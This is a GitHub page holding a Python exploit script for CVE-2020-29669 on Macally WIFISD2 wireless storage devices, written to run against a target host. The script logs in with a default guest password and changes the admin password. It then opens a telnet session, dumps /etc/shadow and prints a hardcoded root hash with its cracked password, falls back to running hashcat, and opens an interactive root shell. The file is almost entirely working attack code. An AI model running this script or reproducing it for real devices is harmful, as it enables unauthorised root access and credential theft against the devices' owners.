forked from code-byter/CVE-2020-29669
-
Notifications
You must be signed in to change notification settings - Fork 1
/
macally_exploit.py
132 lines (121 loc) · 6.04 KB
/
macally_exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
#!/usr/bin/env/python3
import requests
import telnetlib
import os
import sys
import re
banner = '''\033[94m
██████ ▄▄▄█████▓ ▄▄▄ ██▀███ ▄▄▄▄ █ ██ ██▀███ ██████ ▄▄▄█████▓
▒██ ▒ ▓ ██▒ ▓▒▒████▄ ▓██ ▒ ██▒▓█████▄ ██ ▓██▒▓██ ▒ ██▒▒██ ▒ ▓ ██▒ ▓▒
░ ▓██▄ ▒ ▓██░ ▒░▒██ ▀█▄ ▓██ ░▄█ ▒▒██▒ ▄██▓██ ▒██░▓██ ░▄█ ▒░ ▓██▄ ▒ ▓██░ ▒░
▒ ██▒░ ▓██▓ ░ ░██▄▄▄▄██ ▒██▀▀█▄ ▒██░█▀ ▓▓█ ░██░▒██▀▀█▄ ▒ ██▒░ ▓██▓ ░
▒██████▒▒ ▒██▒ ░ ▓█ ▓██▒░██▓ ▒██▒░▓█ ▀█▓▒▒█████▓ ░██▓ ▒██▒▒██████▒▒ ▒██▒ ░
▒ ▒▓▒ ▒ ░ ▒ ░░ ▒▒ ▓▒█░░ ▒▓ ░▒▓░░▒▓███▀▒░▒▓▒ ▒ ▒ ░ ▒▓ ░▒▓░▒ ▒▓▒ ▒ ░ ▒ ░░
░ ░▒ ░ ░ ░ ▒ ▒▒ ░ ░▒ ░ ▒░▒░▒ ░ ░░▒░ ░ ░ ░▒ ░ ▒░░ ░▒ ░ ░ ░
░ ░ ░ ░ ░ ▒ ░░ ░ ░ ░ ░░░ ░ ░ ░░ ░ ░ ░ ░ ░
░ ░ ░ ░ ░ ░ ░ ░
░
\x1b[0m
Macally WIFISD2 Guest to Root Privilege Escalation for CVE-2020-29669 by Maximilian Barz and Daniel Schwendner
'''
def main():
if(len(sys.argv) < 2):
print(banner)
print("Usage: %s <host> " % sys.argv[0])
print("Eg: %s 1.2.3.4 " % sys.argv[0])
return
rhost = sys.argv[1]
session = requests.Session()
guest_creds = "guest_pass"
admin_pass_to_set = "Silky123"
def send_requests():
url = "http://"+rhost+"/protocol.csp?function=set"
payload = {'fname':'security','opt':'pwdchk','name':'guest','pwd1':guest_creds,'function':'set'}
headers = {
'Host': rhost,
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
'Accept': '*/*',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Referer': 'http://'+rhost+'/index.html',
'Content-Type': 'application/x-www-form-urlencoded',
'Content-Length': '65',
'Connection': 'close',
'Cache-Control': 'no-cache',
}
r= session.post(url, payload, headers)
if (b"<errno>0</errno>" in r.content):
print("\033[92m[+] Authentication successful\x1b[0m")
print("\t"+str(session.cookies.get_dict()))
else:
print("\033[91m[+] Authentication failed.\x1b[0m")
sys.exit()
url = "http://"+rhost+"/protocol.csp?fname=security&function=set"
payload = {'name':'admin','opt':'pwdmod','pwd1':admin_pass_to_set,'pwd2':admin_pass_to_set}
headers = {
'Host': rhost,
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
'Accept': '*/*',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Referer': 'http://'+rhost+'/app/user/guest.html',
'Content-Type': 'application/x-www-form-urlencoded',
'Content-Length': '49',
'Connection': 'close',
'Cache-Control': 'no-cache',
}
d = session.post(url, payload, headers)
if (b"<errno>0</errno>" in d.content):
print("\033[92m[+] Admin Password changed to: "+admin_pass_to_set+"\x1b[0m")
telnet_grep_root_hash()
#print("[+] Spawning Admin Shell")
#telnet_login()
else:
print("\033[91m[+] Admin Password change failed\x1b[0m")
sys.exit()
def telnet_grep_root_hash():
user = "admin"
tn = telnetlib.Telnet(rhost)
tn.read_until(b"login: ")
tn.write(user.encode('ascii') + b"\n")
tn.read_until(b"Password: ")
tn.write(admin_pass_to_set.encode('ascii') + b"\n")
print("\033[92m[+] Dumping Hashes:\x1b[0m")
tn.write(b"cat /etc/shadow\n\r")
tn.write(b"exit\n")
output = tn.read_all().decode('ascii')
L = output.split('\n')
for hash in L:
if ":" in hash:
print("\t"+hash)
print("\n\r")
for hash in L:
if "root" in hash:
print("\033[92m[+] Root Hash found, trying to crack it..\x1b[0m")
print("\t"+hash) #root:$1$D0o034Sm$LY0jyeFPifEXVmdgUfSEj/:15386:0:99999:7:::
f = open("root_hash","w+")
f.write(hash)
f.close()
crack_root_hash();
def crack_root_hash():
f = open("root_hash", "r")
hash = f.read()
if ("root:$1$D0o034Sm$LY0jyeFPifEXVmdgUfSEj/:15386:0:99999:7:::" in hash):
print("\033[92mRoot Password: 20080826\x1b[0m\n")
telnet_login()
else:
os.system("hashcat -a 0 -m 500 root_hash /root/tools/routersploit/routersploit/resources/wordlists/passwords.txt") #https://github.com/threat9/routersploit/blob/master/routersploit/resources/wordlists/passwords.txt
def telnet_login():
print("\033[92m[+] Spawning Rootshell\x1b[0m")
user = "root"
root_password="20080826"
tn = telnetlib.Telnet(rhost)
tn.read_until(b"login: ")
tn.write(user.encode('ascii') + b"\n")
tn.read_until(b"Password: ")
tn.write(root_password.encode('ascii') + b"\n")
tn.interact()
print(banner)
send_requests()
if(__name__ == '__main__'):
main()